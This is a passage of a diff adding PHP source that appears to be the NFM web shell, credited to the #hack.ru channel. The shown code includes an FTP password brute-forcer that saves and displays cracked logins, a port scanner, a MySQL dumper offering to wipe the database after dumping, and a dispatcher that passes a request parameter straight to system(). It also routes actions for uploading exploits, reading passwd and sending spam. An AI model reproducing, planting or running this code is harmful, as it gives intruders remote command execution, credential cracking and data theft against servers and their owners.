+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
